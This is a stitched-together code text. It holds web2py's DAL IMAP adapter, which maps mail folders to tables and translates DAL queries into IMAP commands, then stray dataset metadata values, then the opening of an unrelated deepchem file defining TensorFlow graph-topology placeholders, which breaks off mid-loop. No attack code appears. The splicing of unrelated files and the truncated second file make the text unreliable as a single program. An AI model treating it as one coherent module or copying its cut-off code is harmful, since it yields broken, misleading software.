# -*- coding: utf-8 -*- import datetime import re import sys from .._globals import IDENTITY, GLOBAL_LOCKER from .._compat import PY2, integer_types, basestring from ..connection import ConnectionPool from ..objects import Field, Query, Expression from ..helpers.classes import SQLALL from ..helpers.methods import use_common_filters from ..adapters.base import NoSQLAdapter long = integer_types[-1] class IMAPAdapter(NoSQLAdapter): """ IMAP server adapter This class is intended as an interface with email IMAP servers to perform simple queries in the web2py DAL query syntax, so email read, search and other related IMAP mail services (as those implemented by brands like Google(r), and Yahoo!(r) can be managed from web2py applications. The code uses examples by Yuji Tomita on this post: http://yuji.wordpress.com/2011/06/22/python-imaplib-imap-example-with-gmail/#comment-1137 and is based in docs for Python imaplib, python email and email IETF's (i.e. RFC2060 and RFC3501) This adapter was tested with a small set of operations with Gmail(r). Other services requests could raise command syntax and response data issues. It creates its table and field names "statically", meaning that the developer should leave the table and field definitions to the DAL instance by calling the adapter's .define_tables() method. The tables are defined with the IMAP server mailbox list information. .define_tables() returns a dictionary mapping dal tablenames to the server mailbox names with the following structure: {<tablename>: str <server mailbox name>} Here is a list of supported fields: =========== ============== =========== Field Type Description =========== ============== =========== uid string answered boolean Flag created date content list:string A list of dict text or html parts to string cc string bcc string size integer the amount of octets of the message* deleted boolean Flag draft boolean Flag flagged boolean Flag sender string recent boolean Flag seen boolean Flag subject string mime string The mime header declaration email string The complete RFC822 message (*) attachments list Each non text part as dict encoding string The main detected encoding =========== ============== =========== (*) At the application side it is measured as the length of the RFC822 message string WARNING: As row id's are mapped to email sequence numbers, make sure your imap client web2py app does not delete messages during select or update actions, to prevent updating or deleting different messages. Sequence numbers change whenever the mailbox is updated. To avoid this sequence numbers issues, it is recommended the use of uid fields in query references (although the update and delete in separate actions rule still applies). 
:: # This is the code recommended to start imap support # at the app's model: imapdb = DAL("imap://user:password@server:port", pool_size=1) # port 993 for ssl imapdb.define_tables() Here is an (incomplete) list of possible imap commands:: # Count today's unseen messages # smaller than 6000 octets from the # inbox mailbox q = imapdb.INBOX.seen == False q &= imapdb.INBOX.created == datetime.date.today() q &= imapdb.INBOX.size < 6000 unread = imapdb(q).count() # Fetch last query messages rows = imapdb(q).select() # it is also possible to filter query select results with limitby and # sequences of mailbox fields set.select(<fields sequence>, limitby=(<int>, <int>)) # Mark last query messages as seen messages = [row.uid for row in rows] seen = imapdb(imapdb.INBOX.uid.belongs(messages)).update(seen=True) # Delete messages in the imap database that have mails from mr. Gumby deleted = 0 for mailbox in imapdb.tables deleted += imapdb(imapdb[mailbox].sender.contains("gumby")).delete() # It is possible also to mark messages for deletion instead of ereasing them # directly with set.update(deleted=True) # This object give access # to the adapter auto mailbox # mapped names (which native # mailbox has what table name) imapdb.mailboxes <dict> # tablename, server native name pairs # To retrieve a table native mailbox name use: imapdb.<table>.mailbox ### New features v2.4.1: # Declare mailboxes statically with tablename, name pairs # This avoids the extra server names retrieval imapdb.define_tables({"inbox": "INBOX"}) # Selects without content/attachments/email columns will only # fetch header and flags imapdb(q).select(imapdb.INBOX.sender, imapdb.INBOX.subject) """ drivers = ('imaplib',) types = { 'string': str, 'text': str, 'date': datetime.date, 'datetime': datetime.datetime, 'id': long, 'boolean': bool, 'integer': int, 'bigint': long, 'blob': str, 'list:string': str } dbengine = 'imap' REGEX_URI = re.compile('^(?P<user>[^:]+)(\:(?P<password>[^@]*))?@(?P<host>\[[^/]+\]|[^\:@]+)(\:(?P<port>[0-9]+))?$') def __init__(self, db, uri, pool_size=0, folder=None, db_codec ='UTF-8', credential_decoder=IDENTITY, driver_args={}, adapter_args={}, do_connect=True, after_connection=None): super(IMAPAdapter, self).__init__( db=db, uri=uri, pool_size=pool_size, folder=folder, db_codec=db_codec, credential_decoder=credential_decoder, driver_args=driver_args, adapter_args=adapter_args, do_connect=do_connect, after_connection=after_connection) # db uri: user@example.com:password@imap.server.com:123 # TODO: max size adapter argument for preventing large mail transfers if do_connect: self.find_driver(adapter_args) self.credential_decoder = credential_decoder self.driver_args = driver_args self.adapter_args = adapter_args self.mailbox_size = None self.static_names = None self.charset = sys.getfilesystemencoding() # imap class self.imap4 = None uri = uri.split("://")[1] """ MESSAGE is an identifier for sequence number""" self.flags = {'deleted': '\\Deleted', 'draft': '\\Draft', 'flagged': '\\Flagged', 'recent': '\\Recent', 'seen': '\\Seen', 'answered': '\\Answered'} self.search_fields = { 'id': 'MESSAGE', 'created': 'DATE', 'uid': 'UID', 'sender': 'FROM', 'to': 'TO', 'cc': 'CC', 'bcc': 'BCC', 'content': 'TEXT', 'size': 'SIZE', 'deleted': '\\Deleted', 'draft': '\\Draft', 'flagged': '\\Flagged', 'recent': '\\Recent', 'seen': '\\Seen', 'subject': 'SUBJECT', 'answered': '\\Answered', 'mime': None, 'email': None, 'attachments': None } m = self.REGEX_URI.match(uri) user = m.group('user') password = m.group('password') host = 
m.group('host') port = int(m.group('port')) over_ssl = False if port==993: over_ssl = True driver_args.update(host=host,port=port, password=password, user=user) def connector(driver_args=driver_args): # it is assumed sucessful authentication alLways # TODO: support direct connection and login tests if over_ssl: self.imap4 = self.driver.IMAP4_SSL else: self.imap4 = self.driver.IMAP4 connection = self.imap4(driver_args["host"], driver_args["port"]) data = connection.login(driver_args["user"], driver_args["password"]) # static mailbox list connection.mailbox_names = None # dummy dbapi functions connection.cursor = lambda : self.fake_cursor connection.close = lambda : None connection.commit = lambda : None return connection self.db.define_tables = self.define_tables self.connector = connector if do_connect: self.reconnect() def reconnect(self, f=None): """ IMAP4 Pool connection method imap connection lacks of self cursor command. A custom command should be provided as a replacement for connection pooling to prevent uncaught remote session closing """ if getattr(self, 'connection', None) is not None: return if f is None: f = self.connector if not self.pool_size: self.connection = f() self.cursor = self.connection.cursor() else: POOLS = ConnectionPool.POOLS uri = self.uri while True: GLOBAL_LOCKER.acquire() if not uri in POOLS: POOLS[uri] = [] if POOLS[uri]: self.connection = POOLS[uri].pop() GLOBAL_LOCKER.release() self.cursor = self.connection.cursor() if self.cursor and self.check_active_connection: try: # check if connection is alive or close it result, data = self.connection.list() except: # Possible connection reset error # TODO: read exception class self.connection = f() break else: GLOBAL_LOCKER.release() self.connection = f() self.cursor = self.connection.cursor() break self.after_connection_hook() def get_last_message(self, tablename): last_message = None # request mailbox list to the server if needed. if not isinstance(self.connection.mailbox_names, dict): self.get_mailboxes() try: result = self.connection.select( self.connection.mailbox_names[tablename]) last_message = int(result[1][0]) # Last message must be a positive integer if last_message == 0: last_message = 1 except (IndexError, ValueError, TypeError, KeyError): e = sys.exc_info()[1] self.db.logger.debug("Error retrieving the last mailbox" + " sequence number. 
%s" % str(e)) return last_message def get_uid_bounds(self, tablename): if not isinstance(self.connection.mailbox_names, dict): self.get_mailboxes() # fetch first and last messages # return (first, last) messages uid's last_message = self.get_last_message(tablename) result, data = self.connection.uid("search", None, "(ALL)") uid_list = data[0].strip().split() if len(uid_list) <= 0: return None else: return (uid_list[0], uid_list[-1]) def convert_date(self, date, add=None, imf=False): if add is None: add = datetime.timedelta() """ Convert a date object to a string with d-Mon-Y style for IMAP or the inverse case add <timedelta> adds to the date object """ months = [None, "JAN","FEB","MAR","APR","MAY","JUN", "JUL", "AUG","SEP","OCT","NOV","DEC"] if isinstance(date, basestring): # Prevent unexpected date response format try: if "," in date: dayname, datestring = date.split(",") else: dayname, datestring = None, date date_list = datestring.strip().split() year = int(date_list[2]) month = months.index(date_list[1].upper()) day = int(date_list[0]) hms = list(map(int, date_list[3].split(":"))) return datetime.datetime(year, month, day, hms[0], hms[1], hms[2]) + add except (ValueError, AttributeError, IndexError) as e: self.db.logger.error("Could not parse date text: %s. %s" % (date, e)) return None elif isinstance(date, (datetime.date, datetime.datetime)): if imf: date_format = "%a, %d %b %Y %H:%M:%S %z" else: date_format = "%d-%b-%Y" return (date + add).strftime(date_format) else: return None @staticmethod def header_represent(f, r): from email.header import decode_header text, encoding = decode_header(f)[0] if encoding: text = text.decode(encoding).encode('utf-8') return text def encode_text(self, text, charset, errors="replace"): """ convert text for mail to unicode""" if text is None: text = "" if PY2: if isinstance(text, str): if charset is None: text = unicode(text, "utf-8", errors) else: text = unicode(text, charset, errors) else: raise Exception("Unsupported mail text type %s" % type(text)) return text.encode("utf-8") else: if isinstance(text, bytes): return text.decode("utf-8") return text def get_charset(self, message): charset = message.get_content_charset() return charset def get_mailboxes(self): """ Query the mail database for mailbox names """ if self.static_names: # statically defined mailbox names self.connection.mailbox_names = self.static_names return self.static_names.keys() mailboxes_list = self.connection.list() self.connection.mailbox_names = dict() mailboxes = list() x = 0 for item in mailboxes_list[1]: x = x + 1 item = item.strip() if not "NOSELECT" in item.upper(): sub_items = item.split("\"") sub_items = [sub_item for sub_item in sub_items \ if len(sub_item.strip()) > 0] # mailbox = sub_items[len(sub_items) -1] mailbox = sub_items[-1].strip() # remove unwanted characters and store original names # Don't allow leading non alphabetic characters mailbox_name = re.sub('^[_0-9]*', '', re.sub('[^_\w]','',re.sub('[/ ]','_',mailbox))) mailboxes.append(mailbox_name) self.connection.mailbox_names[mailbox_name] = mailbox return mailboxes def get_query_mailbox(self, query): nofield = True tablename = None attr = query while nofield: if hasattr(attr, "first"): attr = attr.first if isinstance(attr, Field): return attr.tablename elif isinstance(attr, Query): pass else: return None else: return None return tablename def is_flag(self, flag): if self.search_fields.get(flag, None) in self.flags.values(): return True else: return False def define_tables(self, mailbox_names=None): """ Auto 
create common IMAP fileds This function creates fields definitions "statically" meaning that custom fields as in other adapters should not be supported and definitions handled on a service/mode basis (local syntax for Gmail(r), Ymail(r) Returns a dictionary with tablename, server native mailbox name pairs. """ if mailbox_names: # optional statically declared mailboxes self.static_names = mailbox_names else: self.static_names = None if not isinstance(self.connection.mailbox_names, dict): self.get_mailboxes() names = self.connection.mailbox_names.keys() for name in names: self.db.define_table("%s" % name, Field("uid", writable=False), Field("created", "datetime", writable=False), Field("content", "text", writable=False), Field("to", writable=False), Field("cc", writable=False), Field("bcc", writable=False), Field("sender", writable=False), Field("size", "integer", writable=False), Field("subject", writable=False), Field("mime", writable=False), Field("email", "text", writable=False, readable=False), Field("attachments", "text", writable=False, readable=False), Field("encoding", writable=False), Field("answered", "boolean"), Field("deleted", "boolean"), Field("draft", "boolean"), Field("flagged", "boolean"), Field("recent", "boolean", writable=False), Field("seen", "boolean") ) # Set a special _mailbox attribute for storing # native mailbox names self.db[name].mailbox = \ self.connection.mailbox_names[name] # decode quoted printable self.db[name].to.represent = self.db[name].cc.represent = \ self.db[name].bcc.represent = self.db[name].sender.represent = \ self.db[name].subject.represent = self.header_represent # Set the db instance mailbox collections self.db.mailboxes = self.connection.mailbox_names return self.db.mailboxes def create_table(self, *args, **kwargs): # not implemented # but required by DAL pass def select(self, query, fields, attributes): """ Searches and Fetches records and return web2py rows """ # move this statement elsewhere (upper-level) if use_common_filters(query): query = self.common_filter(query, [self.get_query_mailbox(query),]) import email # get records from imap server with search + fetch # convert results to a dictionary tablename = None fetch_results = list() if isinstance(query, Query): tablename = self.get_table(query)._dalname mailbox = self.connection.mailbox_names.get(tablename, None) if mailbox is None: raise ValueError("Mailbox name not found: %s" % mailbox) else: # select with readonly result, selected = self.connection.select(mailbox, True) if result != "OK": raise Exception("IMAP error: %s" % selected) self.mailbox_size = int(selected[0]) search_query = "(%s)" % str(query).strip() search_result = self.connection.uid("search", None, search_query) # Normal IMAP response OK is assumed (change this) if search_result[0] == "OK": # For "light" remote server responses just get the first # ten records (change for non-experimental implementation) # However, light responses are not guaranteed with this # approach, just fewer messages. 
limitby = attributes.get('limitby', None) messages_set = search_result[1][0].split() # descending order messages_set.reverse() if limitby is not None: # TODO: orderby, asc/desc, limitby from complete message set messages_set = messages_set[int(limitby[0]):int(limitby[1])] # keep the requests small for header/flags if any([(field.name in ["content", "size", "attachments", "email"]) for field in fields]): imap_fields = "(RFC822 FLAGS)" else: imap_fields = "(RFC822.HEADER FLAGS)" if len(messages_set) > 0: # create fetch results object list # fetch each remote message and store it in memory # (change to multi-fetch command syntax for faster # transactions) for uid in messages_set: # fetch the RFC822 message body typ, data = self.connection.uid("fetch", uid, imap_fields) if typ == "OK": fr = {"message": int(data[0][0].split()[0]), "uid": long(uid) if PY2 else int(uid), "email": email.message_from_string(data[0][1]), "raw_message": data[0][1]} fr["multipart"] = fr["email"].is_multipart() # fetch flags for the message if PY2: fr["flags"] = self.driver.ParseFlags(data[1]) else: fr["flags"] = self.driver.ParseFlags( bytes(data[1], "utf-8")) fetch_results.append(fr) else: # error retrieving the message body raise Exception("IMAP error retrieving the body: %s" % data) else: raise Exception("IMAP search error: %s" % search_result[1]) elif isinstance(query, (Expression, basestring)): raise NotImplementedError() else: raise TypeError("Unexpected query type") imapqry_dict = {} imapfields_dict = {} if len(fields) == 1 and isinstance(fields[0], SQLALL): allfields = True elif len(fields) == 0: allfields = True else: allfields = False if allfields: colnames = ["%s.%s" % (tablename, field) for field in self.search_fields.keys()] else: colnames = [field.longname for field in fields] for k in colnames: imapfields_dict[k] = k imapqry_list = list() imapqry_array = list() for fr in fetch_results: attachments = [] content = [] size = 0 n = int(fr["message"]) item_dict = dict() message = fr["email"] uid = fr["uid"] charset = self.get_charset(message) flags = fr["flags"] raw_message = fr["raw_message"] # Return messages data mapping static fields # and fetched results. Mapping should be made # outside the select function (with auxiliary # instance methods) # pending: search flags states through the email message # instances for correct output # preserve subject encoding (ASCII/quoted printable) if "%s.id" % tablename in colnames: item_dict["%s.id" % tablename] = n if "%s.created" % tablename in colnames: item_dict["%s.created" % tablename] = self.convert_date(message["Date"]) if "%s.uid" % tablename in colnames: item_dict["%s.uid" % tablename] = uid if "%s.sender" % tablename in colnames: # If there is no encoding found in the message header # force utf-8 replacing characters (change this to # module's defaults).
Applies to .sender, .to, .cc and .bcc fields item_dict["%s.sender" % tablename] = message["From"] if "%s.to" % tablename in colnames: item_dict["%s.to" % tablename] = message["To"] if "%s.cc" % tablename in colnames: if "Cc" in message.keys(): item_dict["%s.cc" % tablename] = message["Cc"] else: item_dict["%s.cc" % tablename] = "" if "%s.bcc" % tablename in colnames: if "Bcc" in message.keys(): item_dict["%s.bcc" % tablename] = message["Bcc"] else: item_dict["%s.bcc" % tablename] = "" if "%s.deleted" % tablename in colnames: item_dict["%s.deleted" % tablename] = "\\Deleted" in flags if "%s.draft" % tablename in colnames: item_dict["%s.draft" % tablename] = "\\Draft" in flags if "%s.flagged" % tablename in colnames: item_dict["%s.flagged" % tablename] = "\\Flagged" in flags if "%s.recent" % tablename in colnames: item_dict["%s.recent" % tablename] = "\\Recent" in flags if "%s.seen" % tablename in colnames: item_dict["%s.seen" % tablename] = "\\Seen" in flags if "%s.subject" % tablename in colnames: item_dict["%s.subject" % tablename] = message["Subject"] if "%s.answered" % tablename in colnames: item_dict["%s.answered" % tablename] = "\\Answered" in flags if "%s.mime" % tablename in colnames: item_dict["%s.mime" % tablename] = message.get_content_type() if "%s.encoding" % tablename in colnames: item_dict["%s.encoding" % tablename] = charset # Here goes the whole RFC822 body as an email instance # for controller side custom processing # The message is stored as a raw string # >> email.message_from_string(raw string) # returns a Message object for enhanced object processing if "%s.email" % tablename in colnames: # WARNING: no encoding performed (raw message) item_dict["%s.email" % tablename] = raw_message # Size measure as suggested in a Velocity Reviews post # by Tim Williams: "how to get size of email attachment" # Note: len() and server RFC822.SIZE reports don't match # To retrieve the server size for representation would add a new # fetch transaction to the process for part in message.walk(): maintype = part.get_content_maintype() if ("%s.attachments" % tablename in colnames) or \ ("%s.content" % tablename in colnames): payload = part.get_payload(decode=True) if payload: filename = part.get_filename() values = {"mime": part.get_content_type()} if ((filename or not "text" in maintype) and ("%s.attachments" % tablename in colnames)): values.update({"payload": payload, "filename": filename, "encoding": part.get_content_charset(), "disposition": part["Content-Disposition"]}) attachments.append(values) elif (("text" in maintype) and ("%s.content" % tablename in colnames)): values.update({"text": self.encode_text(payload, self.get_charset(part))}) content.append(values) if "%s.size" % tablename in colnames: if part is not None: size += len(str(part)) item_dict["%s.content" % tablename] = content item_dict["%s.attachments" % tablename] = attachments item_dict["%s.size" % tablename] = size imapqry_list.append(item_dict) # extra object mapping for the sake of rows object # creation (sends an array of lists) for item_dict in imapqry_list: imapqry_array_item = list() for fieldname in colnames: imapqry_array_item.append(item_dict[fieldname]) imapqry_array.append(imapqry_array_item) # parse result and return a rows object processor = attributes.get('processor',self.parse) return processor(imapqry_array, fields, colnames) def insert(self, table, fields): def add_payload(message, obj): payload = Message() encoding = obj.get("encoding", "utf-8") if encoding and (encoding.upper() in
("BASE64", "7BIT", "8BIT", "BINARY")): payload.add_header("Content-Transfer-Encoding", encoding) else: payload.set_charset(encoding) mime = obj.get("mime", None) if mime: payload.set_type(mime) if "text" in obj: payload.set_payload(obj["text"]) elif "payload" in obj: payload.set_payload(obj["payload"]) if "filename" in obj and obj["filename"]: payload.add_header("Content-Disposition", "attachment", filename=obj["filename"]) message.attach(payload) mailbox = table.mailbox d = dict(((k.name, v) for k, v in fields)) date_time = d.get("created") or datetime.datetime.now() struct_time = date_time.timetuple() if len(d) > 0: message = d.get("email", None) attachments = d.get("attachments", []) content = d.get("content", []) flags = " ".join(["\\%s" % flag.capitalize() for flag in ("answered", "deleted", "draft", "flagged", "recent", "seen") if d.get(flag, False)]) if not message: from email.message import Message mime = d.get("mime", None) charset = d.get("encoding", None) message = Message() message["from"] = d.get("sender", "") message["subject"] = d.get("subject", "") message["date"] = self.convert_date(date_time, imf=True) if mime: message.set_type(mime) if charset: message.set_charset(charset) for item in ("to", "cc", "bcc"): value = d.get(item, "") if isinstance(value, basestring): message[item] = value else: message[item] = ";".join([i for i in value]) if (not message.is_multipart() and (not message.get_content_type().startswith( "multipart"))): if isinstance(content, basestring): message.set_payload(content) elif len(content) > 0: message.set_payload(content[0]["text"]) else: [add_payload(message, c) for c in content] [add_payload(message, a) for a in attachments] message = message.as_string() result, data = self.connection.append(mailbox, flags, struct_time, message) if result == "OK": uid = int(re.findall("\d+", str(data))[-1]) return self.db(table.uid==uid).select(table.id).first().id else: raise Exception("IMAP message append failed: %s" % data) else: raise NotImplementedError("IMAP empty insert is not implemented") def update(self, table, query, fields): # TODO: the adapter should implement an .expand method commands = list() rowcount = 0 tablename = table._dalname if use_common_filters(query): query = self.common_filter(query, [tablename,]) mark = [] unmark = [] if query: for item in fields: field = item[0] name = field.name value = item[1] if self.is_flag(name): flag = self.search_fields[name] if (value is not None) and (flag != "\\Recent"): if value: mark.append(flag) else: unmark.append(flag) result, data = self.connection.select( self.connection.mailbox_names[tablename]) string_query = "(%s)" % query result, data = self.connection.search(None, string_query) store_list = [item.strip() for item in data[0].split() if item.strip().isdigit()] # build commands for marked flags for number in store_list: result = None if len(mark) > 0: commands.append((number, "+FLAGS", "(%s)" % " ".join(mark))) if len(unmark) > 0: commands.append((number, "-FLAGS", "(%s)" % " ".join(unmark))) for command in commands: result, data = self.connection.store(*command) if result == "OK": rowcount += 1 else: raise Exception("IMAP storing error: %s" % data) return rowcount def count(self,query,distinct=None): counter = 0 tablename = self.get_query_mailbox(query) if query and tablename is not None: if use_common_filters(query): query = self.common_filter(query, [tablename,]) result, data = self.connection.select(self.connection.mailbox_names[tablename]) string_query = "(%s)" % query result, data = 
self.connection.search(None, string_query) store_list = [item.strip() for item in data[0].split() if item.strip().isdigit()] counter = len(store_list) return counter def delete(self, table, query): counter = 0 tablename = table._dalname if query: if use_common_filters(query): query = self.common_filter(query, [tablename,]) result, data = self.connection.select(self.connection.mailbox_names[tablename]) string_query = "(%s)" % query result, data = self.connection.search(None, string_query) store_list = [item.strip() for item in data[0].split() if item.strip().isdigit()] for number in store_list: result, data = self.connection.store(number, "+FLAGS", "(\\Deleted)") if result == "OK": counter += 1 else: raise Exception("IMAP store error: %s" % data) if counter > 0: result, data = self.connection.expunge() return counter def BELONGS(self, first, second): result = None name = self.search_fields[first.name] if name == "MESSAGE": values = [str(val) for val in second if str(val).isdigit()] result = "%s" % ",".join(values).strip() elif name == "UID": values = [str(val) for val in second if str(val).isdigit()] result = "UID %s" % ",".join(values).strip() else: raise Exception("Operation not supported") # result = "(%s %s)" % (self.expand(first), self.expand(second)) return result def CONTAINS(self, first, second, case_sensitive=False): # silently ignore, only case sensitive result = None name = self.search_fields[first.name] if name in ("FROM", "TO", "SUBJECT", "TEXT"): result = "%s \"%s\"" % (name, self.expand(second)) else: if first.name in ("cc", "bcc"): result = "%s \"%s\"" % (first.name.upper(), self.expand(second)) elif first.name == "mime": result = "HEADER Content-Type \"%s\"" % self.expand(second) else: raise Exception("Operation not supported") return result def GT(self, first, second): result = None name = self.search_fields[first.name] if name == "MESSAGE": last_message = self.get_last_message(first.tablename) result = "%d:%d" % (int(self.expand(second)) + 1, last_message) elif name == "UID": # GT and LT may not return # expected sets depending on # the uid format implemented try: pedestal, threshold = self.get_uid_bounds(first.tablename) except TypeError: e = sys.exc_info()[1] self.db.logger.debug("Error requesting uid bounds: %s", str(e)) return "" try: lower_limit = int(self.expand(second)) + 1 except (ValueError, TypeError): e = sys.exc_info()[1] raise Exception("Operation not supported (non integer UID)") result = "UID %s:%s" % (lower_limit, threshold) elif name == "DATE": result = "SINCE %s" % self.convert_date(second, add=datetime.timedelta(1)) elif name == "SIZE": result = "LARGER %s" % self.expand(second) else: raise Exception("Operation not supported") return result def GE(self, first, second): result = None name = self.search_fields[first.name] if name == "MESSAGE": last_message = self.get_last_message(first.tablename) result = "%s:%s" % (self.expand(second), last_message) elif name == "UID": # GT and LT may not return # expected sets depending on # the uid format implemented try: pedestal, threshold = self.get_uid_bounds(first.tablename) except TypeError: e = sys.exc_info()[1] self.db.logger.debug("Error requesting uid bounds: %s", str(e)) return "" lower_limit = self.expand(second) result = "UID %s:%s" % (lower_limit, threshold) elif name == "DATE": result = "SINCE %s" % self.convert_date(second) else: raise Exception("Operation not supported") return result def LT(self, first, second): result = None name = self.search_fields[first.name] if name == "MESSAGE": result = "%s:%s" 
% (1, int(self.expand(second)) - 1) elif name == "UID": try: pedestal, threshold = self.get_uid_bounds(first.tablename) except TypeError: e = sys.exc_info()[1] self.db.logger.debug("Error requesting uid bounds: %s", str(e)) return "" try: upper_limit = int(self.expand(second)) - 1 except (ValueError, TypeError): e = sys.exc_info()[1] raise Exception("Operation not supported (non integer UID)") result = "UID %s:%s" % (pedestal, upper_limit) elif name == "DATE": result = "BEFORE %s" % self.convert_date(second) elif name == "SIZE": result = "SMALLER %s" % self.expand(second) else: raise Exception("Operation not supported") return result def LE(self, first, second): result = None name = self.search_fields[first.name] if name == "MESSAGE": result = "%s:%s" % (1, self.expand(second)) elif name == "UID": try: pedestal, threshold = self.get_uid_bounds(first.tablename) except TypeError: e = sys.exc_info()[1] self.db.logger.debug("Error requesting uid bounds: %s", str(e)) return "" upper_limit = int(self.expand(second)) result = "UID %s:%s" % (pedestal, upper_limit) elif name == "DATE": result = "BEFORE %s" % self.convert_date(second, add=datetime.timedelta(1)) else: raise Exception("Operation not supported") return result def NE(self, first, second=None): if (second is None) and isinstance(first, Field): # All records special table query if first.type == "id": return self.GE(first, 1) result = self.NOT(self.EQ(first, second)) result = result.replace("NOT NOT", "").strip() return result def EQ(self,first,second): name = self.search_fields[first.name] result = None if name is not None: if name == "MESSAGE": # query by message sequence number result = "%s" % self.expand(second) elif name == "UID": result = "UID %s" % self.expand(second) elif name == "DATE": result = "ON %s" % self.convert_date(second) elif name in self.flags.values(): if second: result = "%s" % (name.upper()[1:]) else: result = "NOT %s" % (name.upper()[1:]) else: raise Exception("Operation not supported") else: raise Exception("Operation not supported") return result def AND(self, first, second): result = "%s %s" % (self.expand(first), self.expand(second)) return result def OR(self, first, second): result = "OR %s %s" % (self.expand(first), self.expand(second)) return "%s" % result.replace("OR OR", "OR") def NOT(self, first): result = "NOT %s" % self.expand(first) return result
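Note that the comparison methods above (EQ, GT, LT, BELONGS, CONTAINS, AND, OR, NOT) do not emit SQL; they compose IMAP SEARCH criteria, which select() then wraps in parentheses before fetching. A minimal usage sketch, hedged: the connection URI, credentials, and mailbox name are hypothetical, and it assumes a web2py/pydal installation that ships this IMAP adapter:

import datetime
from pydal import DAL  # inside web2py: from gluon import DAL

# define_tables() builds one DAL table per selectable server mailbox
imapdb = DAL("imap://user:password@imap.example.com:993", pool_size=1)
imapdb.define_tables()

# EQ, GT and AND above expand this query into an IMAP SEARCH string,
# roughly "(NOT SEEN SINCE 02-Jan-2015)", before messages are fetched
rows = imapdb((imapdb.INBOX.seen == False) &
              (imapdb.INBOX.created > datetime.date(2015, 1, 1))).select()
for row in rows:
    print(row.subject)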
apache-2.0
6,151,325,805,287,477,000
39.879392
120
0.519421
false
4.500366
false
false
false
joegomes/deepchem
deepchem/models/tf_new_models/graph_topology.py
1
16190
"""Manages Placeholders for Graph convolution networks. """ from __future__ import print_function from __future__ import division from __future__ import unicode_literals __author__ = "Han Altae-Tran and Bharath Ramsundar" __copyright__ = "Copyright 2016, Stanford University" __license__ = "MIT" import numpy as np import tensorflow as tf from deepchem.nn.copy import Input from deepchem.feat.mol_graphs import ConvMol def merge_two_dicts(x, y): z = x.copy() z.update(y) return z def merge_dicts(l): """Convenience function to merge list of dictionaries.""" merged = {} for dict in l: merged = merge_two_dicts(merged, dict) return merged class GraphTopology(object): """Manages placeholders associated with batch of graphs and their topology""" def __init__(self, n_feat, name='topology', max_deg=10, min_deg=0): """ Note that batch size is not specified in a GraphTopology object. A batch of molecules must be combined into a disconnected graph and fed to topology directly to handle batches. Parameters ---------- n_feat: int Number of features per atom. name: str, optional Name of this manager. max_deg: int, optional Maximum #bonds for atoms in molecules. min_deg: int, optional Minimum #bonds for atoms in molecules. """ #self.n_atoms = n_atoms self.n_feat = n_feat self.name = name self.max_deg = max_deg self.min_deg = min_deg self.atom_features_placeholder = tensor = tf.placeholder( dtype='float32', shape=(None, self.n_feat), name=self.name + '_atom_features') self.deg_adj_lists_placeholders = [ tf.placeholder( dtype='int32', shape=(None, deg), name=self.name + '_deg_adj' + str(deg)) for deg in range(1, self.max_deg + 1) ] self.deg_slice_placeholder = tf.placeholder( dtype='int32', shape=(self.max_deg - self.min_deg + 1, 2), name=self.name + '_deg_slice') self.membership_placeholder = tf.placeholder( dtype='int32', shape=(None,), name=self.name + '_membership') # Define the list of tensors to be used as topology self.topology = [self.deg_slice_placeholder, self.membership_placeholder] self.topology += self.deg_adj_lists_placeholders self.inputs = [self.atom_features_placeholder] self.inputs += self.topology def get_input_placeholders(self): """All placeholders. Contains atom_features placeholder and topology placeholders. """ return self.inputs def get_topology_placeholders(self): """Returns topology placeholders Consists of deg_slice_placeholder, membership_placeholder, and the deg_adj_list_placeholders. """ return self.topology def get_atom_features_placeholder(self): return self.atom_features_placeholder def get_deg_adjacency_lists_placeholders(self): return self.deg_adj_lists_placeholders def get_deg_slice_placeholder(self): return self.deg_slice_placeholder def get_membership_placeholder(self): return self.membership_placeholder def batch_to_feed_dict(self, batch): """Converts the current batch of mol_graphs into tensorflow feed_dict. 
Assigns the graph information in an array of ConvMol objects to the placeholder tensors params ------ batch : np.ndarray Array of ConvMol objects returns ------- feed_dict : dict Can be merged with other feed_dicts for input into tensorflow """ # Merge mol conv objects batch = ConvMol.agglomerate_mols(batch) atoms = batch.get_atom_features() deg_adj_lists = [ batch.deg_adj_lists[deg] for deg in range(1, self.max_deg + 1) ] # Generate dicts deg_adj_dict = dict( list(zip(self.deg_adj_lists_placeholders, deg_adj_lists))) atoms_dict = { self.atom_features_placeholder: atoms, self.deg_slice_placeholder: batch.deg_slice, self.membership_placeholder: batch.membership } return merge_dicts([atoms_dict, deg_adj_dict]) class DTNNGraphTopology(GraphTopology): """Manages placeholders associated with batch of graphs and their topology""" def __init__(self, max_n_atoms, n_distance=100, distance_min=-1., distance_max=18., name='DTNN_topology'): """ Parameters ---------- max_n_atoms: int maximum number of atoms in a molecule n_distance: int, optional granularity of the distance matrix; step size will be (distance_max-distance_min)/n_distance distance_min: float, optional minimum distance of atom pairs, default = -1 Angstrom distance_max: float, optional maximum distance of atom pairs, default = 18 Angstrom """ #self.n_atoms = n_atoms self.name = name self.max_n_atoms = max_n_atoms self.n_distance = n_distance self.distance_min = distance_min self.distance_max = distance_max self.atom_number_placeholder = tf.placeholder( dtype='int32', shape=(None, self.max_n_atoms), name=self.name + '_atom_number') self.atom_mask_placeholder = tf.placeholder( dtype='float32', shape=(None, self.max_n_atoms), name=self.name + '_atom_mask') self.distance_matrix_placeholder = tf.placeholder( dtype='float32', shape=(None, self.max_n_atoms, self.max_n_atoms, self.n_distance), name=self.name + '_distance_matrix') self.distance_matrix_mask_placeholder = tf.placeholder( dtype='float32', shape=(None, self.max_n_atoms, self.max_n_atoms), name=self.name + '_distance_matrix_mask') # Define the list of tensors to be used as topology self.topology = [ self.distance_matrix_placeholder, self.distance_matrix_mask_placeholder ] self.inputs = [self.atom_number_placeholder] self.inputs += self.topology def get_atom_number_placeholder(self): return self.atom_number_placeholder def get_distance_matrix_placeholder(self): return self.distance_matrix_placeholder def batch_to_feed_dict(self, batch): """Converts the current batch of Coulomb matrices into tensorflow feed_dict. Assigns the atom number and distance info to the placeholder tensors params ------ batch : np.ndarray Array of Coulomb matrices returns ------- feed_dict : dict Can be merged with other feed_dicts for input into tensorflow """ # Extract atom numbers atom_number = np.asarray(list(map(np.diag, batch))) atom_mask = np.sign(atom_number) atom_number = np.asarray( np.round(np.power(2 * atom_number, 1 / 2.4)), dtype=int) ZiZj = [] for molecule in atom_number: ZiZj.append(np.outer(molecule, molecule)) ZiZj = np.asarray(ZiZj) distance_matrix = np.expand_dims(batch[:], axis=3) distance_matrix = np.concatenate( [distance_matrix] * self.n_distance, axis=3) distance_matrix_mask = batch[:] for im, molecule in enumerate(batch): for ir, row in enumerate(molecule): for ie, element in enumerate(row): if element > 0 and ir != ie: # expand a 